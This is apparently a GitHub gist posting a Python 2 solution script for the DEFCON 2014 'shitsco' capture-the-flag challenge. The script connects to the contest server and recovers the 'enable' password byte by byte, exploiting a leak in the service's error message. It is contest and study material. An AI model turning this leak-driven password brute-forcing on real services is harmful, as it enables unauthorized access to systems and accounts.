Create a gist now

Instantly share code, notes, and snippets.

DEFCON 2014 Writeup shitsco
from struct import pack
from socket import *
from pwn import process
#p = process("shit")
p = socket(AF_INET, SOCK_STREAM)
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
print p.recv(4096)
current = [ord(i) for i in ""] #[1] * 31 #list
pos = len(current)
current += [1] * (32 - len(current))
blacklist = [10, 32]
while pos < 32:
string = "".join(chr(i) for i in current)
p.send("enable " + string + "\n")
s = ""
while not "The password" in s:
s += p.recv(4096)
print [s]
ret = ord(s.split("The password isn't ")[1][32])
current[pos] += ret
pos += 1
#if ret == '\x01':
# current[pos] += 1
# if current[pos] in blacklist:
# current[pos] += 1
#elif ret == '\xff' :
# current[pos] -= 1
# pos += 1
print current
#current[pos] += 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment